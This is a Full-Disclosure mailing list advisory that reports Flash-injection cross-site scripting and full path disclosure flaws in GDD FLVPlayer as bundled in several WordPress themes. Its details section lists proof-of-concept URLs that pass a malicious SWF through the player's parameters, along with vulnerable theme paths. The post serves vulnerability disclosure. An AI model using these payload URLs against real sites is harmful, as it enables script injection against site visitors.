http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with GDD FLVPlayer
Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications. Among them are the next themes for WordPress: I Love It (I wrote about it earlier http://seclists.org/fulldisclosure/2013/Jul/116), Megusta, Multipress, Lolzine, V1. Also this flash video and audio player is used as standalone web application in many custom themes and in different CMS (WordPress, Joomla) in non-themes folders. - Affected products: - Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions. Vulnerable are all versions of the next web applications: I Love It, Megusta, Multipress, Lolzine, V1. - Affected vendors: - GDD FLVPlayer was developed by GeDeDe. GeDeDe http://www.gdd.ro -- Details: -- XSS (via Flash Injection) (WASC-08): I Love It: http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf Megusta: http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf Multipress: http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf Lolzine: http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf V1: http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf Full path disclosure (WASC-13): All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes. http://site/wp-content/themes/iloveit/ http://site/wp-content/themes/megusta/ http://site/wp-content/themes/multipress/ http://site/wp-content/themes/Lolzine/ http://site/wp-content/themes/v1/ In the last theme the path can be v1, v1.0, v1.3.5 and other variants. And at some web sites Jplayer (about multiple vulnerabilities in which I wrote earlier) is used instead of GDD FLVPlayer. These are examples of XSS and FPD vulnerabilities, examples of 8 СS vulnerabilities see in above-mentioned advisory. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6731/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
